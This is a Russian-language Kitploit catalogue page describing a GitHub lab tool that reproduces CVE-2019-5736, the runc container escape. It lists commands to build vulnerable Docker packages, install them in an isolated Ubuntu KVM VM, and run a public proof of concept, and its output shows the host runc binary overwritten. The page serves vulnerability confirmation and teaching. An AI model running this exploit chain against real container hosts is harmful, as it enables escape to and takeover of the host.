Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2019-5736-reproducer — Воспроизводитель для CVE-2019-5736 — уязвимости выхода из контейнера RunC. Предоставляет сборочные скрипты и лабораторию на базе KVM для подтверждения эксплуатации уязвимости в уязвимых пакетах Docker. | Kitploit
Инструменты/GitHubGitHub/takumak/cve-2019-5736-reproducer
Безопасность контейнеровАнализ уязвимостейЭксплуатацияБезопасность облачных средОбучение и ОбразованиеПобег из Контейнера
GitHubtakumak/cve-2019-5736-reproducer

cve-2019-5736-reproducer

Воспроизводитель для CVE-2019-5736 — уязвимости выхода из контейнера RunC. Предоставляет сборочные скрипты и лабораторию на базе KVM для подтверждения эксплуатации уязвимости в уязвимых пакетах Docker.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
74 лет назадЕщё не проверено

CVE-2019-5736 репродуктор

Это позволяет подтвердить, что RunC-CVE-2019-5736 работает в вашем экземпляре KVM.

Обзор рабочего процесса

  • Соберите связанные пакеты docker.io, уязвимые для CVE-2019-5736, в этом репозитории
  • Запустите экземпляр KVM Ubuntu 18.04 на LXD
  • Установите уязвимые пакеты *.deb в виртуальной машине
  • Попробуйте процедуру, описанную в RunC-CVE-2019-5736

Сборка уязвимых пакетов *.deb

root@kitploit:~
$ docker-compose build --no-cache
$ docker-compose run build

Подготовка исходного архива RunC-CVE-2019-5736

root@kitploit:~
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736.git
$ tar cjf RunC-CVE-2019-5736.tar.bz2 RunC-CVE-2019-5736

Запуск экземпляра KVM Ubuntu 18.04 на LXD

root@kitploit:~
$ lxc launch --vm images:ubuntu/18.04 test-cve-2019-5736 -c limits.cpu=4 -c limits.memory=4GB
$ lxc file push deb/*.deb RunC-CVE-2019-5736.tar.bz2 test-cve-2019-5736/root/
$ lxc exec test-cve-2019-5736 bash
root@test-cve-2019-5736:~# sed -i -e '/bionic-updates/s/^/#/' -e '/bionic-security/s/^/#/' /etc/apt/sources.list
root@test-cve-2019-5736:~# apt update
root@test-cve-2019-5736:~# apt install iptables libltdl7
root@test-cve-2019-5736:~# dpkg -i containerd_0.2.5-0ubuntu2_amd64.deb docker.io_17.12.1-0ubuntu6_amd64.deb runc_1.0.0~rc6+git20181203.96ec2177-0~ubuntu2_amd64.deb

Обратите внимание, что следует использовать images:ubuntu/18.04 вместо ubuntu:18.04, потому что команда lxc exec не работает должным образом с последним.

Воспроизведение RunC-CVE-2019-5736

root@kitploit:~
$ lxc exec test-cve-2019-5736 bash
root@test-cve-2019-5736:~# tar xf RunC-CVE-2019-5736.tar.bz2
root@test-cve-2019-5736:~# cd RunC-CVE-2019-5736
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker build -t cve-2019-5736:exec_POC ./exec_POC
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
92b965383f377419f3dad7cec45e468a4c4a83e82e11a2f2e0e23803016e2840
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker exec poc_ctr bash
No help topic for '/usr/bin/bash'
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# /usr/bin/docker-runc

**THE ALL NEW AND IMPROVED RUNC**

        [+] Your backdoor here ->

root@test-cve-2019-5736:~/RunC-CVE-2019-5736# 

Приложение

  • Коммит с исправлением: https://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b
Скачать инструмент